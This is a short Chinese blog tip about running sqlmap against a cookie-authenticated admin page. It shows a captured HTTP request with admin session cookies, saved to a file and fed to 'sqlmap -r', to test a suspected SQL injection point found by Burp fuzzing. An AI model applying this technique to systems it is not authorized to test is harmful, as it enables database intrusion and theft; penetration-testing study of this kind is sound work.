关于Sqlmap注入连接验证的问题

  • A+
所属分类:网络安全

某些WEB程序在用户界面或者管理界面设置的安全系数不大,前台安全系数很严格,或许我们抓到个某个Bug,他用是COOKIES认真
\

经过burpsuite各种FUZZ报错,这应该是个SQL注入点 www.2cto.com
\
咋办呢?手工吧?自己不是Helen那一级别的大神,看到注入只会–level5 再加 –risk=5,
直接丢输入工具因为验证的问题访问不了,可以把数据包保存下来

E:\tools\SQL Tool\sqlmap>cat 1.txt
GET /admin/board/board.php?code=1&category=&active=board_view&page=1&keyfield=&key=&uid=170 HTTP/1.1

Accept: text/html, application/xhtml+xml, */*
Referer: http://XXXXXXX.XX/admin/main.php
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: XXXXXXX.XX
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=a4cc27cfe8a662cb0feda14a9d0eb321; COOKIE_ADMIN=admin; COOKIE_ADMINKEY=rhsObHmHBIDR
w; COOKIE_ADMINNAME=%B0%FC%B8%AE%C0%DA; COOKIE_ADMINPASS=1234; COOKIE_ADMIN_A_=1%2C2%2C3%2C4; COOKIE
_ADMIN_B_=1%2C2%2C3%2C4; COOKIE_ADMIN_C_=1%2C2%2C3%2C4; COOKIE_ADMIN_D_=1%2C2%2C3%2C4; COOKIE_ADMIN_
E_=1%2C2%2C3%2C4; COOKIE_ADMIN_F_=1%2C2%2C3%2C4
E:\tools\SQL Tool\sqlmap>

直接丢SQLMAP , Sqlmap -r data.txt
\
其实还有个更简单的办法 围观地址:http://www.2cto.com/Article/201208/145006.html

  • 我的微信
  • 这是我的微信扫一扫
  • weinxin
  • 我的微信公众号
  • 我的微信公众号扫一扫
  • weinxin

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: